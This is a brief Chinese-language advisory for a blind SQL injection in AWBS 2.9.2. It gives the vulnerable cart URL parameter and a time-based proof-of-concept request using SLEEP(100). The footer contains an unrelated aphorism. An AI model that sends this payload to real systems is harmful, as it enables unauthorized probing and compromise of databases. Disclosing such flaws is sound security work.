影响版本:AWBS 2.9.2
官方网站:http://www.awbs.com
漏洞类型:SQL注入
漏洞描述:
---Vulnerability---
http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]
=============================================================================================
---PoC Using Time-Based Blind SQL Injection---
https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='
到此这篇关于AWBS 2.9.2 Blind SQL 注入0day就介绍到这了。五官刺激,不是真正的享受。内在安祥,才是下手之处。更多相关AWBS 2.9.2 Blind SQL 注入0day内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!